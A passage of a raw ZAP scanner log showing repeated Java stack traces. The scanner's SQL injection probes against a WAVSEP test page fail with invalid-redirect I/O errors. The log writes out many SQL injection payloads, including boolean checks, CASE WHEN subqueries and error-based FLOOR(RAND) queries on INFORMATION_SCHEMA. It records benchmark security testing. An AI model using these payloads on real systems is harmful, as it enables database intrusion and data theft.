org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688215 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 7708=4505 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 7708=4505 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688216 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3443=8406-- GYNS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 3443=8406-- GYNS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688217 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 5977=5977-- kzIi] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 5977=5977-- kzIi at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688219 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3443=8406-- GYNS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 3443=8406-- GYNS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688221 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (5792=7411) THEN 5792 ELSE 5792*(SELECT 5792 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/(SELECT (CASE WHEN (5792=7411) THEN 5792 ELSE 5792*(SELECT 5792 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688223 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6735=6735) THEN 6735 ELSE 6735*(SELECT 6735 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/(SELECT (CASE WHEN (6735=6735) THEN 6735 ELSE 6735*(SELECT 6735 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688224 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (5792=7411) THEN 5792 ELSE 5792*(SELECT 5792 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/(SELECT (CASE WHEN (5792=7411) THEN 5792 ELSE 5792*(SELECT 5792 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688226 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT 2816 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2816=2816,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9354=9354] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND (SELECT 2816 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2816=2816,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9354=9354 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688228 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 6990 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6990=6990,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND (SELECT 6990 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6990=6990,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688230 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT 9017 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9017=9017,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('TWCp'='TWCp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND (SELECT 9017 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9017=9017,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('TWCp'='TWCp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688232 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT 9352 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9352=9352,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Mfsa'='Mfsa] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND (SELECT 9352 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9352=9352,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Mfsa'='Mfsa at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688232 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT 5482 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5482=5482,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND (SELECT 5482 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5482=5482,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688233 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 9082 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9082=9082,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- EBAl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND (SELECT 9082 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9082=9082,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- EBAl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 